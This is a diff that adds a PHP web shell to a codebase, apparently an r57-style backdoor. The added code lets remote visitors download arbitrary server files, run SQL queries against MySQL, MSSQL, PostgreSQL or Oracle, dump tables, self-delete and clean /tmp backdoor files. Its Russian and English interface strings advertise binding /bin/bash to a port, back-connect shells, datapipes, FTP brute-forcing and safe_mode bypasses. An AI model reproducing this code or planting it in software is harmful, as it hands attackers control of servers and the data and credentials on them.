+            $timearray['hours']   = 0;
+            $timearray['minutes'] = 0;
+            $timearray['seconds'] = 0;
+        }
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    }
+    function addFile($data, $name, $time = 0)
+    {
+        $name     = str_replace('\\', '/', $name);
+        $dtime    = dechex($this->unix2DosTime($time));
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+        $fr   = "\x50\x4b\x03\x04";
+        $fr   .= "\x14\x00";
+        $fr   .= "\x00\x00";
+        $fr   .= "\x08\x00";
+        $fr   .= $hexdtime;
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+        $c_len   = strlen($zdata);
+        $fr      .= pack('V', $crc);
+        $fr      .= pack('V', $c_len);
+        $fr      .= pack('V', $unc_len);
+        $fr      .= pack('v', strlen($name));
+        $fr      .= pack('v', 0);
+        $fr      .= $name;
+        $fr .= $zdata;
+        $this -> datasec[] = $fr;
+        $cdrec = "\x50\x4b\x01\x02";
+        $cdrec .= "\x00\x00";
+        $cdrec .= "\x14\x00";
+        $cdrec .= "\x00\x00";
+        $cdrec .= "\x08\x00";
+        $cdrec .= $hexdtime;
+        $cdrec .= pack('V', $crc);
+        $cdrec .= pack('V', $c_len);
+        $cdrec .= pack('V', $unc_len);
+        $cdrec .= pack('v', strlen($name) );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('V', 32 );
+        $cdrec .= pack('V', $this -> old_offset );
+        $this -> old_offset += strlen($fr);
+        $cdrec .= $name;
+        $this -> ctrl_dir[] = $cdrec;
+    }
+    function file()
+    {
+        $data    = implode('', $this -> datasec);
+        $ctrldir = implode('', $this -> ctrl_dir);
+        return
+            $data .
+            $ctrldir .
+            $this -> eof_ctrl_dir .
+            pack('v', sizeof($this -> ctrl_dir)) .
+            pack('v', sizeof($this -> ctrl_dir)) .
+            pack('V', strlen($ctrldir)) .
+            pack('V', strlen($data)) .
+            "\x00\x00";
+    }
+}
+function compress(&$filename,&$filedump,$compress)
+ {
+    global $content_encoding;
+    global $mime_type;
+    if ($compress == 'bzip' && @function_exists('bzcompress'))
+     {
+        $filename  .= '.bz2';
+        $mime_type = 'application/x-bzip2';
+        $filedump = bzcompress($filedump);
+     }
+     else if ($compress == 'gzip' && @function_exists('gzencode'))
+     {
+        $filename  .= '.gz';
+        $content_encoding = 'x-gzip';
+        $mime_type = 'application/x-gzip';
+        $filedump = gzencode($filedump);
+     }
+     else if ($compress == 'zip' && @function_exists('gzcompress'))
+     {
+             $filename .= '.zip';
+        $mime_type = 'application/zip';
+        $zipfile = new zipfile();
+        $zipfile -> addFile($filedump, substr($filename, 0, -4));
+        $filedump = $zipfile -> file();
+     }
+     else
+     {
+             $mime_type = 'application/octet-stream';
+     }
+ }
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers  = "From: $from\r\n";
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(@mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+class my_sql
+ {
+ var $host = 'localhost';
+ var $port = '';
+ var $user = '';
+ var $pass = '';
+ var $base = '';
+ var $db   = '';
+ var $connection;
+ var $res;
+ var $error;
+ var $rows;
+ var $columns;
+ var $num_rows;
+ var $num_fields;
+ var $dump;
+
+ function connect()
+  {
+          switch($this->db)
+     {
+           case 'MySQL':
+            if(empty($this->port)) { $this->port = '3306'; }
+            if(!function_exists('mysql_connect')) return 0;
+            $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
+            if(is_resource($this->connection)) return 1;
+           break;
+     case 'MSSQL':
+      if(empty($this->port)) { $this->port = '1433'; }
+            if(!function_exists('mssql_connect')) return 0;
+            $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
+      if($this->connection) return 1;
+     break;
+     case 'PostgreSQL':
+      if(empty($this->port)) { $this->port = '5432'; }
+      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
+      if(!function_exists('pg_connect')) return 0;
+      $this->connection = @pg_connect($str);
+      if(is_resource($this->connection)) return 1;
+     break;
+     case 'Oracle':
+      if(!function_exists('ocilogon')) return 0;
+      $this->connection = @ocilogon($this->user, $this->pass, $this->base);
+      if(is_resource($this->connection)) return 1;
+     break;
+     }
+    return 0;
+  }
+
+ function select_db()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           if(@mysql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'MSSQL':
+           if(@mssql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'PostgreSQL':
+     return 1;
+    break;
+    case 'Oracle':
+     return 1;
+    break;
+    }
+   return 0;
+  }
+
+ function query($query)
+  {
+   $this->res=$this->error='';
+   switch($this->db)
+    {
+          case 'MySQL':
+     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
+      {
+      $this->error = @mysql_error($this->connection);
+      return 0;
+      }
+     else if(is_resource($this->res)) { return 1; }
+     return 2;
+          break;
+    case 'MSSQL':
+     if(false===($this->res=@mssql_query($query,$this->connection)))
+      {
+      $this->error = 'Query error';
+      return 0;
+      }
+      else if(@mssql_num_rows($this->res) > 0) { return 1; }
+     return 2;
+    break;
+    case 'PostgreSQL':
+     if(false===($this->res=@pg_query($this->connection,$query)))
+      {
+      $this->error = @pg_last_error($this->connection);
+      return 0;
+      }
+      else if(@pg_num_rows($this->res) > 0) { return 1; }
+     return 2;
+    break;
+    case 'Oracle':
+     if(false===($this->res=@ociparse($this->connection,$query)))
+      {
+      $this->error = 'Query parse error';
+      }
+     else
+      {
+      if(@ociexecute($this->res))
+       {
+       if(@ocirowcount($this->res) != 0) return 2;
+       return 1;
+       }
+      $error = @ocierror();
+      $this->error=$error['message'];
+      }
+    break;
+    }
+  return 0;
+  }
+ function get_result()
+  {
+   $this->rows=array();
+   $this->columns=array();
+   $this->num_rows=$this->num_fields=0;
+   switch($this->db)
+    {
+          case 'MySQL':
+           $this->num_rows=@mysql_num_rows($this->res);
+           $this->num_fields=@mysql_num_fields($this->res);
+           while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
+           @mysql_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'MSSQL':
+           $this->num_rows=@mssql_num_rows($this->res);
+           $this->num_fields=@mssql_num_fields($this->res);
+           while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
+           @mssql_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
+    break;
+    case 'PostgreSQL':
+           $this->num_rows=@pg_num_rows($this->res);
+           $this->num_fields=@pg_num_fields($this->res);
+           while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
+           @pg_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'Oracle':
+     $this->num_fields=@ocinumcols($this->res);
+     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
+     @ocifreestatement($this->res);
+     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    }
+   return 0;
+  }
+ function dump($table)
+  {
+   if(empty($table)) return 0;
+   $this->dump=array();
+   $this->dump[0] = '##';
+   $this->dump[1] = '## --------------------------------------- ';
+   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
+   $this->dump[3] = '## Database: '.$this->base;
+   $this->dump[4] = '##    Table: '.$table;
+   $this->dump[5] = '## --------------------------------------- ';
+   switch($this->db)
+    {
+          case 'MySQL':
+           $this->dump[0] = '## MySQL dump';
+           if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
+           if(!$this->get_result()) return 0;
+           $this->dump[] = $this->rows[0]['Create Table'];
+     $this->dump[] = '## --------------------------------------- ';
+           if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
+            $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'MSSQL':
+     $this->dump[0] = '## MSSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'PostgreSQL':
+     $this->dump[0] = '## PostgreSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'Oracle':
+      $this->dump[0] = '## ORACLE dump';
+      $this->dump[]  = '## under construction';
+    break;
+    default:
+     return 0;
+    break;
+    }
+   return 1;
+  }
+ function close()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           @mysql_close($this->connection);
+    break;
+    case 'MSSQL':
+     @mssql_close($this->connection);
+    break;
+    case 'PostgreSQL':
+     @pg_close($this->connection);
+    break;
+    case 'Oracle':
+     @oci_close($this->connection);
+    break;
+    }
+  }
+ function affected_rows()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           return @mysql_affected_rows($this->res);
+    break;
+    case 'MSSQL':
+     return @mssql_affected_rows($this->res);
+    break;
+    case 'PostgreSQL':
+     return @pg_affected_rows($this->res);
+    break;
+    case 'Oracle':
+     return @ocirowcount($this->res);
+    break;
+    default:
+     return 0;
+    break;
+    }
+  }
+ }
+if(isset($_GET['img'])&&!empty($_GET['img']))
+ {
+ $images = array();
+ $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw==';
+ $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw==';
+ @ob_clean();
+ header("Content-type: image/gif");
+ echo base64_decode($images[$_GET['img']]);
+ die();
+ }
+if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+  if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; }
+  else
+   {
+    @ob_clean();
+    $filename = @basename($_POST['d_name']);
+    $filedump = @fread($file,@filesize($_POST['d_name']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");
+    echo $filedump;
+    exit();
+   }
+ }
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if ($_POST['cmd']=="db_query")
+ {
+ echo $head;
+ $sql = new my_sql();
+ $sql->db   = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];
+ $sql->base = $_POST['mysql_db'];
+ $querys = @explode(';',$_POST['db_query']);
+
+ if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
+  else
+   {
+   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
+   else
+    {
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5)
+      {
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
+      switch($sql->query($query))
+       {
+       case '0':
+       echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
+       break;
+       case '1':
+       if($sql->get_result())
+        {
+               echo "<table width=100%>";
+        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
+               $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns);
+        echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+        for($i=0;$i<$sql->num_rows;$i++)
+         {
+         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
+         $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);
+         echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
+         }
+        echo "</table>";
+        }
+       break;
+       case '2':
+       $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
+       echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
+       break;
+       }
+      }
+     }
+    }
+   }
+ echo "<br><form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_server',0,$_POST['db_server']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+$lang=array(
+'ru_text1' =>'Âûïîëíåííàÿ êîìàíäà',
+'ru_text2' =>'Âûïîëíåíèå êîìàíä íà ñåðâåðå',
+'ru_text3' =>'Âûïîëíèòü êîìàíäó',
+'ru_text4' =>'Ãàáî÷àÿ äèðåêòîðèÿ',
+'ru_text5' =>'Çàãðóçêà ôàéëîâ íà ñåðâåð',
+'ru_text6' =>'Ëîêàëüíûé ôàéë',
+'ru_text7' =>'Àëèàñû',
+'ru_text8' =>'Âûáåðèòå àëèàñ',
+'ru_butt1' =>'Âûïîëíèòü',
+'ru_butt2' =>'Çàãðóçèòü',
+'ru_text9' =>'Ãòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash',
+'ru_text10'=>'Ãòêðûòü ïîðò',
+'ru_text11'=>'Ãàðîëü äëÿ äîñòóïà',
+'ru_butt3' =>'Ãòêðûòü',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-àäðåñ',
+'ru_text14'=>'Ãîðò',
+'ru_butt4' =>'Âûïîëíèòü',
+'ru_text15'=>'Çàãðóçêà ôàéëîâ ñ óäàëåííîãî ñåðâåðà',
+'ru_text16'=>'Èñïîëüçîâàòü',
+'ru_text17'=>'Óäàëåííûé ôàéë',
+'ru_text18'=>'Ëîêàëüíûé ôàéë',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'Èñïîëüçîâàòü',
+'ru_text21'=>'Ãîâîå èìÿ',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'Ëîêàëüíûé ïîðò',
+'ru_text24'=>'Óäàëåííûé õîñò',
+'ru_text25'=>'Óäàëåííûé ïîðò',
+'ru_text26'=>'Èñïîëüçîâàòü',
+'ru_butt5' =>'Çàïóñòèòü',
+'ru_text28'=>'Ãàáîòà â safe_mode',
+'ru_text29'=>'Äîñòóï çàïðåùåí',
+'ru_butt6' =>'Ñìåíèòü',
+'ru_text30'=>'Ãðîñìîòð ôàéëà',
+'ru_butt7' =>'Âûâåñòè',
+'ru_text31'=>'Ôàéë íå íàéäåí',
+'ru_text32'=>'Âûïîëíåíèå PHP êîäà',
+'ru_text33'=>'Ãðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé open_basedir ÷åðåç ôóíêöèè cURL',
+'ru_butt8' =>'Ãðîâåðèòü',
+'ru_text34'=>'Ãðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç ôóíêöèþ include',
+'ru_text35'=>'Ãðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç çàãðóçêó ôàéëà â mysql',
+'ru_text36'=>'Ãàçà . Òàáëèöà',
+'ru_text37'=>'Ëîãèí',
+'ru_text38'=>'Ãàðîëü',
+'ru_text39'=>'Ãàçà',
+'ru_text40'=>'Äàìï òàáëèöû áàçû äàííûõ',
+'ru_butt9' =>'Äàìï',
+'ru_text41'=>'Ñîõðàíèòü â ôàéëå',
+'ru_text42'=>'Ãåäàêòèðîâàíèå ôàéëà',
+'ru_text43'=>'Ãåäàêòèðîâàòü ôàéë',
+'ru_butt10'=>'Ñîõðàíèòü',
+'ru_butt11'=>'Ãåäàêòèðîâàòü',
+'ru_text44'=>'Ãåäàêòèðîâàíèå ôàéëà íåâîçìîæíî! Äîñòóï òîëüêî äëÿ ÷òåíèÿ!',
+'ru_text45'=>'Ôàéë ñîõðàíåí',
+'ru_text46'=>'Ãðîñìîòð phpinfo()',
+'ru_text47'=>'Ãðîñìîòð íàñòðîåê php.ini',
+'ru_text48'=>'Óäàëåíèå âðåìåííûõ ôàéëîâ',
+'ru_text49'=>'Óäàëåíèå ñêðèïòà ñ ñåðâåðà',
+'ru_text50'=>'Èíôîðìàöèÿ î ïðîöåññîðå',
+'ru_text51'=>'Èíôîðìàöèÿ î ïàìÿòè',
+'ru_text52'=>'Òåêñò äëÿ ïîèñêà',
+'ru_text53'=>'Èñêàòü â ïàïêå',
+'ru_text54'=>'Ãîèñê òåêñòà â ôàéëàõ',
+'ru_butt12'=>'Ãàéòè',
+'ru_text55'=>'Òîëüêî â ôàéëàõ',
+'ru_text56'=>'Ãè÷åãî íå íàéäåíî',
+'ru_text57'=>'Ñîçäàòü/Óäàëèòü Ôàéë/Äèðåêòîðèþ',
+'ru_text58'=>'Èìÿ',
+'ru_text59'=>'Ôàéë',
+'ru_text60'=>'Äèðåêòîðèþ',
+'ru_butt13'=>'Ñîçäàòü/Óäàëèòü',
+'ru_text61'=>'Ôàéë ñîçäàí',
+'ru_text62'=>'Äèðåêòîðèÿ ñîçäàíà',
+'ru_text63'=>'Ôàéë óäàëåí',
+'ru_text64'=>'Äèðåêòîðèÿ óäàëåíà',
+'ru_text65'=>'Ñîçäàòü',
+'ru_text66'=>'Óäàëèòü',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'Êîìàíäà',
+'ru_text69'=>'Ãàðàìåòð1',
+'ru_text70'=>'Ãàðàìåòð2',
+'ru_text71'=>"Âòîðîé ïàðàìåòð êîìàíäû:\r\n- äëÿ CHOWN - èìÿ íîâîãî ïîëüçîâàòåëÿ èëè åãî UID (÷èñëîì) \r\n- äëÿ êîìàíäû CHGRP - èìÿ ãðóïïû èëè GID (÷èñëîì) \r\n- äëÿ êîìàíäû CHMOD - öåëîå ÷èñëî â âîñüìåðè÷íîì ïðåäñòàâëåíèè (íàïðèìåð 0777)",
+'ru_text72'=>'Òåêñò äëÿ ïîèñêà',
+'ru_text73'=>'Èñêàòü â ïàïêå',
+'ru_text74'=>'Èñêàòü â ôàéëàõ',
+'ru_text75'=>'* ìîæíî èñïîëüçîâàòü ðåãóëÿðíîå âûðàæåíèå',
+'ru_text76'=>'Ãîèñê òåêñòà â ôàéëàõ ñ ïîìîùüþ óòèëèòû find',
+'ru_text80'=>'Òèï',
+'ru_text81'=>'Ñåòü',
+'ru_text82'=>'Ãàçû äàííûõ',
+'ru_text83'=>'Âûïîëíåíèå SQL çàïðîñà',
+'ru_text84'=>'SQL çàïðîñ',
+'ru_text85'=>'Ãðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç âûïîëíåíèå êîìàíä â MSSQL ñåðâåðå',
+'ru_text86'=>'Ñêà÷èâàíèå ôàéëà ñ ñåðâåðà',
+'ru_butt14'=>'Ñêà÷àòü',
+'ru_text87'=>'Ñêà÷èâàíèå ôàéëîâ ñ óäàëåííîãî ftp-ñåðâåðà',
+'ru_text88'=>'FTP-ñåðâåð:ïîðò',
+'ru_text89'=>'Ôàéë íà ftp ñåðâåðå',
+'ru_text90'=>'Ãåæèì ïåðåäà÷è',
+'ru_text91'=>'Àðõèâèðîâàòü â',
+'ru_text92'=>'áåç àðõèâàöèè',
+'ru_text93'=>'FTP',
+'ru_text94'=>'FTP-áðóòôîðñ',
+'ru_text95'=>'Ñïèñîê ïîëüçîâàòåëåé',
+'ru_text96'=>'ÃÃ¥ óäàëîñü ïîëó÷èòü ñïèñîê ïîëüçîâàòåëåé',
+'ru_text97'=>'Ãðîâåðåíî êîìáèíàöèé: ',
+'ru_text98'=>'Óäà÷íûõ ïîäêëþ÷åíèé: ',
+'ru_text99'=>'* â êà÷åñòâå ëîãèíà è ïàðîëÿ èñïîëüçóåòñÿ èìÿ ïîëüçîâàòåëÿ èç /etc/passwd',
+'ru_text100'=>'Ãòïðàâêà ôàéëîâ íà óäàëåííûé ôòï ñåðâåð',
+'ru_text101'=>'Èñïîëüçîâàòü òàêæå ïåðåâåðíóòîå (user -> resu) èìÿ ïîëüçîâàòåëÿ â êà÷åñòâå ïàðîëÿ',
+'ru_text102'=>'Ãî÷òà',
+'ru_text103'=>'Ãòïðàâêà ïèñüìà',
+'ru_text104'=>'Ãòïðàâêà ôàéëà íà ïî÷òîâûé ÿùèê',
+'ru_text105'=>'Êîìó',
+'ru_text106'=>'Ãò',
+'ru_text107'=>'Òåìà',
+'ru_butt15'=>'Ãòïðàâèòü',
+'ru_text108'=>'Òåêñò ïèñüìà',
+'ru_text109'=>'Ñâåðíóòü',
+'ru_text110'=>'Ãàçâåðíóòü',
+'ru_text111'=>'SQL-Ñåðâåð : ïîðò',
+'ru_text112'=>'Ãðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç èñïîëüçîâàíèå ôóíêöèè mb_send_mail',
+'ru_text113'=>'Ãðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode, ïðîñìîòð ëèñòèíãà äèðåêòîðèé ñ èñïîëüçîâàíèåì imap_list',
+'ru_text114'=>'Ãðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode, ïðîñìîòð ñîäåðæèìîãî ôàéëà ñ èñïîëüçîâàíèåì imap_body',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database . Table',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Database',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
